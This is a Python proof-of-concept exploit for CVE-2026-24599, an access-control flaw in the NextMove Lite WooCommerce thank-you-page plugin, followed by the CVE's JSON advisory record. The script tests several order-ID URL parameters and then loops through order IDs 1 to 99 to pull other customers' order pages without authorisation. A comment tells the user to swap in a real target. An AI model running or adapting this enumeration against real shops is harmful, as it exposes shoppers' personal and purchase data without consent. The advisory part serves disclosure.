CVE-2026-24599

import requests # CVE-2026-24599 NextMove Lite IDOR Vulnerability PoC # Target: WordPress site with NextMove Lite plugin <= 2.23.0 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2026-24599 IDOR vulnerability """ # Try to access order page with manipulated order ID # Replace ORDER_ID with a valid order ID from the target site test_order_id = 1 # Method 1: Direct URL manipulation vulnerable_endpoints = [ f"{target_url}/?nextmove_order_id={test_order_id}", f"{target_url}/?order_id={test_order_id}", f"{target_url}/?wc_order={test_order_id}", f"{target_url}/thank-you/?order={test_order_id}" ] for endpoint in vulnerable_endpoints: try: response = requests.get(endpoint, timeout=10) # Check if response contains sensitive order data if response.status_code == 200: # Look for order-related keywords in response if any(keyword in response.text.lower() for keyword in ['order', 'thank you', 'confirmation']): print(f"[+] Potential vulnerability found at: {endpoint}") print(f"[+] Response contains order-related content") return True except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return False def exploit_idor(target_url, order_id): """ Exploit IDOR vulnerability to retrieve order information """ exploit_url = f"{target_url}/?nextmove_order_id={order_id}" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: response = requests.get(exploit_url, headers=headers, timeout=10) if response.status_code == 200: # Extract sensitive information from response print(f"[+] Successfully accessed order ID: {order_id}") print(f"[+] Response length: {len(response.text)} bytes") return response.text except requests.RequestException as e: print(f"[-] Exploit failed: {e}") return None # Usage example if __name__ == "__main__": target = "https://example.com/checkout" # Replace with actual target if check_vulnerability(target): print("[!] Target appears to be vulnerable to CVE-2026-24599") # Try to enumerate multiple orders for order_id in range(1, 100): exploit_idor(target, order_id) else: print("[-] Target does not appear to be vulnerable")

{"cve": {"id": "CVE-2026-24599", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:18.110", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in XLPlugins NextMove Lite woo-thank-you-page-nextmove-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects NextMove Lite: from n/a through <= 2.23.0."}, {"lang": "es", "value": "Vulnerabilidad de elusión de autorización a través de clave controlada por el usuario en XLPlugins NextMove Lite woo-thank-you-page-nextmove-lite permite explotar niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a NextMove Lite: desde n/a hasta &lt;= 2.23.0."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-thank-you-page-nextmove-lite/vulnerability/wordpress-nextmove-lite-plugin-2-23-0-insecure-direct-object-references-idor-vulnerability?_s_id=cve", "source": "[email protected]"}]}}